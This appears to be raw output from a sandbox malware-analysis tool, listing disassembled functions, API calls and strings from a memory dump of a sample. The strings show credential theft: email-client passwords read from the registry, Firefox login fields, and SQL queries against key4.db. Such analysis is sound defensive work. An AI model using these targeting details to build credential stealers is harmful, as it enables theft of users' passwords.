                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                              • API String ID: 3963849919-1658304561
                                                                                                                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                                                                              • String ID: (yE$(yE$(yE
                                                                                                                                                              • API String ID: 1865533344-362086290
                                                                                                                                                              • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                              • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                              • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                              • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                              • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                              • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                              • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                              • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                              • memset.MSVCRT ref: 0040E736
                                                                                                                                                              • memset.MSVCRT ref: 0040E74F
                                                                                                                                                              • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                              • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                              • memset.MSVCRT ref: 0040E858
                                                                                                                                                              • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                              • API String ID: 4171719235-3943159138
                                                                                                                                                              • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                              • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                              • GetDC.USER32 ref: 004104E2
                                                                                                                                                              • strlen.MSVCRT ref: 00410522
                                                                                                                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                              • sprintf.MSVCRT ref: 00410640
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                                                                              • API String ID: 1703216249-3046471546
                                                                                                                                                              • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                              • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004024F5
                                                                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,75A8EB20,?,00000000), ref: 00402533
                                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscpy$QueryValuememset
                                                                                                                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                              • API String ID: 168965057-606283353
                                                                                                                                                              • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                              • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00402869
                                                                                                                                                                • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,75A8EB20,?,00000000), ref: 004028A3
                                                                                                                                                                • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,75A8EB20,?,00000000), ref: 0040297B
                                                                                                                                                                • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                              • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                              • API String ID: 1497257669-167382505
                                                                                                                                                              • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                              • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                              • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                              • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                              • memset.MSVCRT ref: 0040128E
                                                                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2998058495-0
                                                                                                                                                              • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                              • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                              APIs
                                                                                                                                                              • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                              • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                              • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                              • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                              • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                              • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                              • API String ID: 231171946-2189169393
                                                                                                                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                              • API String ID: 633282248-1996832678
                                                                                                                                                              • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                              • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00406782
                                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                              • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                              • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                              • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                              • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                              • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                              • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                              Strings
                                                                                                                                                              • , xrefs: 00406834
                                                                                                                                                              • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                              • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                              • key4.db, xrefs: 00406756
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                              • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                              • API String ID: 3614188050-3983245814
                                                                                                                                                              • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                              • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                              • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                              • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: sprintf$memset$_mbscpy
                                                                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                              • API String ID: 3402215030-3842416460
                                                                                                                                                              • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                              • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                              • strlen.MSVCRT ref: 0040F139
                                                                                                                                                              • strlen.MSVCRT ref: 0040F147
                                                                                                                                                              • memset.MSVCRT ref: 0040F187
                                                                                                                                                              • strlen.MSVCRT ref: 0040F196
                                                                                                                                                              • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                              • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                              • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                              • strlen.MSVCRT ref: 0040F207
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
